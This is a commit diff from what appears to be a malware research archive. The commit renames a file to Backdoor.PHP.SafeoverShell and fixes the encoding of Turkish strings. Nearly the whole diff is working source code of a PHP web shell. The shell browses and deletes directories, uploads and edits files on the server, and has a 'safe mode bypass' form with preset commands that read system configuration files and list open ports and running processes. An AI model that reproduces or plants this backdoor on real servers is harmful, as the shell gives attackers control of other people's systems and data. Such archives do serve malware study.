Skip to content
Snippets Groups Projects
Unverified Commit 941f9491 authored by vxunderground's avatar vxunderground Committed by GitHub
Browse files

Rename Backdoor.PHP.Agent.br to Backdoor.PHP.SafeoverShell

parent 0f7d0134
No related branches found
No related tags found
No related merge requests found
...@@ -294,10 +294,10 @@ if ( $cmd=="dir" ) { ...@@ -294,10 +294,10 @@ if ( $cmd=="dir" ) {
$h=@opendir($dir); $h=@opendir($dir);
if ($h == false) { if ($h == false) {
echo "<br><font color=\"red\">".sp(3)."\n\n\n\n echo "<br><font color=\"red\">".sp(3)."\n\n\n\n
Klasr Listelenemiyor!Ltfen Bypass Blmn Deneyin.<br>".sp(3)."\n Klasör Listelenemiyor!Lütfen Bypass Bölümünü Deneyin.<br>".sp(3)."\n
Script Gecisi Tamamlayamadi! Script Gecisi Tamamlayamadi!
<br><br>".sp(3)."\n <br><br>".sp(3)."\n
Klasre Girmek Icin yetkiniz Olduguna emin Olunuz... Klasöre Girmek Icin yetkiniz Olduguna emin Olunuz...
<br><br></font>\n\n\n\n"; <br><br></font>\n\n\n\n";
} }
if (function_exists('realpath')) { if (function_exists('realpath')) {
...@@ -358,7 +358,7 @@ if ( $cmd=="dir" ) { ...@@ -358,7 +358,7 @@ if ( $cmd=="dir" ) {
&nbsp;Yetkiler&nbsp; &nbsp;Yetkiler&nbsp;
</td> </td>
<td NOWRAP class="silver border noleft"> <td NOWRAP class="silver border noleft">
&nbsp;Son Dzenleme&nbsp; &nbsp;Son Düzenleme&nbsp;
</td> </td>
<tr> <tr>
<?php <?php
...@@ -529,7 +529,7 @@ if ( $cmd=="dir" ) { ...@@ -529,7 +529,7 @@ if ( $cmd=="dir" ) {
} }
echo "</table><table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr>\n<td NOWRAP width=100% class=\"silver border noright\">\n"; echo "</table><table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr>\n<td NOWRAP width=100% class=\"silver border noright\">\n";
echo "&nbsp;&nbsp;".@count ($dirn)."&nbsp;Klasr,&nbsp;".@count ($filen)."&nbsp;Dosya&nbsp;&nbsp;\n"; echo "&nbsp;&nbsp;".@count ($dirn)."&nbsp;Klasör,&nbsp;".@count ($filen)."&nbsp;Dosya&nbsp;&nbsp;\n";
echo "</td><td NOWRAP class=\"silver border noleft\">\n"; echo "</td><td NOWRAP class=\"silver border noleft\">\n";
echo "&nbsp;&nbsp;Toplam Dosya Boyutu:&nbsp;".formatsize($filesizes)."&nbsp;&nbsp;<td></tr>\n"; echo "&nbsp;&nbsp;Toplam Dosya Boyutu:&nbsp;".formatsize($filesizes)."&nbsp;&nbsp;<td></tr>\n";
...@@ -580,14 +580,14 @@ if ( $cmd=="dir" ) { ...@@ -580,14 +580,14 @@ if ( $cmd=="dir" ) {
/* <!-- Other Actions --> */ /* <!-- Other Actions --> */
echo "<tr><td class=\"silver border\">&nbsp;<strong>Diger Islemler:&nbsp;&nbsp;</strong>&nbsp;</td>\n"; echo "<tr><td class=\"silver border\">&nbsp;<strong>Diger Islemler:&nbsp;&nbsp;</strong>&nbsp;</td>\n";
echo "<td>&nbsp;<b>".buildUrl( "| Yeni Dosya |", "cmd=newfile&lastcmd=dir&lastdir=$dir")."\n".sp(3). echo "<td>&nbsp;<b>".buildUrl( "| Yeni Dosya |", "cmd=newfile&lastcmd=dir&lastdir=$dir")."\n".sp(3).
buildUrl( "| Yeni Klasr |", "cmd=newdir&lastcmd=dir&lastdir=$dir")."\n".sp(3). buildUrl( "| Yeni Klasör |", "cmd=newdir&lastcmd=dir&lastdir=$dir")."\n".sp(3).
buildUrl( "| Dosya Ykle |", "cmd=upload&dir=$dir&lastcmd=dir&lastdir=$dir"). "</b>\n</td></tr>\n"; buildUrl( "| Dosya Yükle |", "cmd=upload&dir=$dir&lastcmd=dir&lastdir=$dir"). "</b>\n</td></tr>\n";
echo "<tr><td class=\"silver border\">&nbsp;<strong>Script Location:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PATH_TRANSLATED</td></tr>\n"; echo "<tr><td class=\"silver border\">&nbsp;<strong>Script Location:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PATH_TRANSLATED</td></tr>\n";
echo "<tr><td class=\"silver border\">&nbsp;<strong>IP Adresin:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$REMOTE_ADDR&nbsp;</td></tr>\n"; echo "<tr><td class=\"silver border\">&nbsp;<strong>IP Adresin:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$REMOTE_ADDR&nbsp;</td></tr>\n";
echo "<tr><td class=\"silver border\">&nbsp;<strong>Bulundugun Klasr:&nbsp;&nbsp;</strong></td><td>&nbsp;$partdir&nbsp;</td></tr>\n"; echo "<tr><td class=\"silver border\">&nbsp;<strong>Bulundugun Klasör:&nbsp;&nbsp;</strong></td><td>&nbsp;$partdir&nbsp;</td></tr>\n";
echo "<tr><td valign=\"top\" class=\"silver border\">&nbsp;<strong>Semboller:&nbsp;&nbsp;</strong&nbsp;</td><td>\n"; echo "<tr><td valign=\"top\" class=\"silver border\">&nbsp;<strong>Semboller:&nbsp;&nbsp;</strong&nbsp;</td><td>\n";
echo "<table NOWRAP>"; echo "<table NOWRAP>";
echo "<tr><td><strong>D:</strong></td><td>&nbsp;&nbsp;Klasr.</td></tr>\n"; echo "<tr><td><strong>D:</strong></td><td>&nbsp;&nbsp;Klasör.</td></tr>\n";
echo "<tr><td><strong>R:</strong></td><td>&nbsp;&nbsp;Okunabilir.</td></tr>\n"; echo "<tr><td><strong>R:</strong></td><td>&nbsp;&nbsp;Okunabilir.</td></tr>\n";
echo "<tr><td><strong>W:</strong></td><td>&nbsp;&nbsp;Yazilabilir.</td></tr>\n"; echo "<tr><td><strong>W:</strong></td><td>&nbsp;&nbsp;Yazilabilir.</td></tr>\n";
echo "<tr><td><strong>X:</strong></td><td>&nbsp;&nbsp;Komut Calistirilabilir.</td></tr>\n"; echo "<tr><td><strong>X:</strong></td><td>&nbsp;&nbsp;Komut Calistirilabilir.</td></tr>\n";
...@@ -609,7 +609,7 @@ elseif ( $cmd=="deldir" ) { /*<!-- Delete a directory and all it's files --> */ ...@@ -609,7 +609,7 @@ elseif ( $cmd=="deldir" ) { /*<!-- Delete a directory and all it's files --> */
else { else {
echo "Successfully removed \"$file\"<br>"; echo "Successfully removed \"$file\"<br>";
} }
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dn\"></form>"; echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form>";
} }
else { else {
echo "Are you sure you want to delete \"$file\" and all it's subdirectories ? echo "Are you sure you want to delete \"$file\" and all it's subdirectories ?
...@@ -635,7 +635,7 @@ elseif ( $cmd=="deldir" ) { /*<!-- Delete a directory and all it's files --> */ ...@@ -635,7 +635,7 @@ elseif ( $cmd=="deldir" ) { /*<!-- Delete a directory and all it's files --> */
else { else {
echo "Successfully removed \"$file\"<br>"; echo "Successfully removed \"$file\"<br>";
} }
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dn\"></form>"; echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form>";
} }
else { else {
echo "Are you sure you want to delete \"$file\" ? echo "Are you sure you want to delete \"$file\" ?
...@@ -668,7 +668,7 @@ elseif ( $cmd=="newfile" ) { /*<!-- Create new file with default name --> */ ...@@ -668,7 +668,7 @@ elseif ( $cmd=="newfile" ) { /*<!-- Create new file with default name --> */
<form action=\"$SFileName?$urlAdd\" method=\"POST\"> <form action=\"$SFileName?$urlAdd\" method=\"POST\">
<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"> <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
<input type=\"hidden\" name=\"dir\" value=\"$lastdir\"> <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
<input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dn\"> <input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\">
</form></center> </form></center>
</td></tr></table></center> "; </td></tr></table></center> ";
} }
...@@ -685,7 +685,7 @@ elseif ( $cmd=="newdir" ) { /*<!-- Create new directory with default name --> */ ...@@ -685,7 +685,7 @@ elseif ( $cmd=="newdir" ) { /*<!-- Create new directory with default name --> */
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"> echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\">
<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"> <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
<input type=\"hidden\" name=\"dir\" value=\"$lastdir\"> <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
<input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dn\"> <input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\">
</form></center></td></tr></table></center>"; </form></center></td></tr></table></center>";
} }
elseif ( $cmd=="edit" ) { /*<!-- Edit a file and save it afterwards with the saveedit block. --> */ elseif ( $cmd=="edit" ) { /*<!-- Edit a file and save it afterwards with the saveedit block. --> */
...@@ -738,17 +738,17 @@ elseif ( $cmd=="upload" ) { /* <!-- Upload File form --> */ ...@@ -738,17 +738,17 @@ elseif ( $cmd=="upload" ) { /* <!-- Upload File form --> */
<table> <table>
<tr> <tr>
<td NOWRAP> <td NOWRAP>
Dosya Ykleme Sekmesine Tikladiniz ! Dosya Yükleme Sekmesine Tikladiniz !
<br> Eger Yklemek istediginiz Dosya mevcut ise zerine Yazilir.<br><br> <br> Eger Yüklemek istediginiz Dosya mevcut ise üzerine Yazilir.<br><br>
<form enctype="multipart/form-data" action="<?php echo "$SFileName?$urlAdd" ?>" method="post"> <form enctype="multipart/form-data" action="<?php echo "$SFileName?$urlAdd" ?>" method="post">
<input type="hidden" name="MAX_FILE_SIZE" value="1099511627776"> <input type="hidden" name="MAX_FILE_SIZE" value="1099511627776">
<input type="hidden" name="cmd" value="uploadproc"> <input type="hidden" name="cmd" value="uploadproc">
<input type="hidden" name="dir" value="<?php echo $dir ?>"> <input type="hidden" name="dir" value="<?php echo $dir ?>">
<input type="hidden" name="lastcmd" value="<?php echo $lastcmd ?>"> <input type="hidden" name="lastcmd" value="<?php echo $lastcmd ?>">
<input type="hidden" name="lastdir" value="<?php echo $lastdir ?>"> <input type="hidden" name="lastdir" value="<?php echo $lastdir ?>">
Dosya Ykle:<br> Dosya Yükle:<br>
<input size="75" name="userfile" type="file"><br> <input size="75" name="userfile" type="file"><br>
<input type="submit" value="Ykle"> <input type="submit" value="Yükle">
</form> </form>
<br> <br>
<form action="<?php echo "$SFileName?$urlAdd" ?>" method="POST"> <form action="<?php echo "$SFileName?$urlAdd" ?>" method="POST">
...@@ -769,14 +769,14 @@ elseif ( $cmd=="uploadproc" ) { /* <!-- Process Uploaded file --> */ ...@@ -769,14 +769,14 @@ elseif ( $cmd=="uploadproc" ) { /* <!-- Process Uploaded file --> */
$res = copy($userfile, "$dir/$userfile_name"); $res = copy($userfile, "$dir/$userfile_name");
echo "Uploaded \"$userfile_name\" to \"$userfile\"; <br>\n"; echo "Uploaded \"$userfile_name\" to \"$userfile\"; <br>\n";
if ($res) { if ($res) {
echo "Basariyla Yklendi \"$userfile\" to \"$dir/$userfile_name\".\n<br><br>"; echo "Basariyla Yüklendi \"$userfile\" to \"$dir/$userfile_name\".\n<br><br>";
echo "Yklenen Dosya Adi: \"$userfile_name\".\n<br>Dosya Adi: \"$userfile\".\n<br>"; echo "Yüklenen Dosya Adi: \"$userfile_name\".\n<br>Dosya Adi: \"$userfile\".\n<br>";
echo "Dosya Boyutu: ".formatsize($userfile_size).".\n<br>Filetype: $userfile_type.\n<br>"; echo "Dosya Boyutu: ".formatsize($userfile_size).".\n<br>Filetype: $userfile_type.\n<br>";
} }
else { else {
echo "Yklenemedi..."; echo "Yüklenemedi...";
} }
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dn\"></form></center>" ; echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form></center>" ;
echo "<br><br></td></tr></table></center>"; echo "<br><br></td></tr></table></center>";
} }
elseif ( $cmd=="file" ) { /* <!-- View a file in text --> */ elseif ( $cmd=="file" ) { /* <!-- View a file in text --> */
...@@ -812,7 +812,7 @@ elseif ( $cmd=="ren" ) { /* <!-- File and Directory Rename --> */ ...@@ -812,7 +812,7 @@ elseif ( $cmd=="ren" ) { /* <!-- File and Directory Rename --> */
echo "Error: Can't copy the file, the file could be in use or you don't have permission to rename it."; echo "Error: Can't copy the file, the file could be in use or you don't have permission to rename it.";
} }
} }
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dn\"></form></center>" ; echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form></center>" ;
} }
else { else {
$dpos = strrpos($oldfile, "/"); $dpos = strrpos($oldfile, "/");
...@@ -866,13 +866,13 @@ else { /* <!-- There is a incorrect or no parameter specified... Let's open the ...@@ -866,13 +866,13 @@ else { /* <!-- There is a incorrect or no parameter specified... Let's open the
<tr> <tr>
<td valign="top" class="silver border"> <td valign="top" class="silver border">
<?php echo buildUrl( sp(2)."<font color=\"navy\"><strong>##Safe0ver##</strong></font>", "cmd=dir&dir=.").sp(2); ?> </td> <?php echo buildUrl( sp(2)."<font color=\"navy\"><strong>##Safe0ver##</strong></font>", "cmd=dir&dir=.").sp(2); ?> </td>
<td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP><span class="style5"> Safe0ver Shell Piyasada Bulunan Bir Cok Shell'in Kodlarindan(c99,r57 vs...) Sentezlenerek Kodlanmistir.Entegre Olarak Bypass zelligi Eklenmis Ve Bylece Tahrip Gc Ykseltilmistir.Yazilimimiz Hic bir Virus,worm,trojan gibi Kullaniciyi Tehdit Eden Veya Smren yazilimlar Icermemektedir.<p>--------------------------<p>Bypass Kullanm:<b>Cat /home/evilc0der/public_html/config.php</b> Gibi Olmalidir.<br> <td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP><span class="style5"> Safe0ver Shell Piyasada Bulunan Bir Cok Shell'in Kodlarindan(c99,r57 vs...) Sentezlenerek Kodlanmistir.Entegre Olarak Bypass Özelligi Eklenmis Ve Böylece Tahrip Gücü Yükseltilmistir.Yazilimimiz Hic bir Virus,worm,trojan gibi Kullaniciyi Tehdit Eden Veya Sömüren yazilimlar Icermemektedir.<p>--------------------------<p>Bypass Kullaným:<b>Cat /home/evilc0der/public_html/config.php</b> Gibi Olmalidir.<br>
</span></td> </span></td>
</tr> </tr>
</table> </table>
<br><p><br>Safe Mode ByPAss<p><form method="POST"> <br><p><br>Safe Mode ByPAss<p><form method="POST">
<p align="center"><input type="text" size="40" value="<? if($_POST['dizin'] != "") { echo $_POST['dizin']; } else echo $klasor;?>" name="dizin"> <p align="center"><input type="text" size="40" value="<? if($_POST['dizin'] != "") { echo $_POST['dizin']; } else echo $klasor;?>" name="dizin">
<input type="submit" value="alistir"></p> <input type="submit" value="Çalistir"></p>
</form> </form>
<form method="POST"> <form method="POST">
<p align="center"><select size="1" name="dizin"> <p align="center"><select size="1" name="dizin">
...@@ -883,9 +883,9 @@ else { /* <!-- There is a incorrect or no parameter specified... Let's open the ...@@ -883,9 +883,9 @@ else { /* <!-- There is a incorrect or no parameter specified... Let's open the
<option value="cat /etc/hosts">cat /etc/hosts</option> <option value="cat /etc/hosts">cat /etc/hosts</option>
<option value="cat /etc/named.conf">cat /etc/named.conf</option> <option value="cat /etc/named.conf">cat /etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">cat /etc/httpd/conf/httpd.conf</option> <option value="cat /etc/httpd/conf/httpd.conf">cat /etc/httpd/conf/httpd.conf</option>
<option value="netstat -an | grep -i listen">Aik Portlar</option> <option value="netstat -an | grep -i listen">Açik Portlar</option>
<option value="ps -aux">alisan Uygulamalar</option> <option value="ps -aux">Çalisan Uygulamalar</option>
</select> <input type="submit" value="alistir"></p> </select> <input type="submit" value="Çalistir"></p>
</form> </form>
------------------------------------------------------------------------------------<p> ------------------------------------------------------------------------------------<p>
<? <?
...@@ -936,4 +936,4 @@ if ($cmd != "downl") { ...@@ -936,4 +936,4 @@ if ($cmd != "downl") {
<?php <?php
} }
?> ?>
\ No newline at end of file
0% Loading or .
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment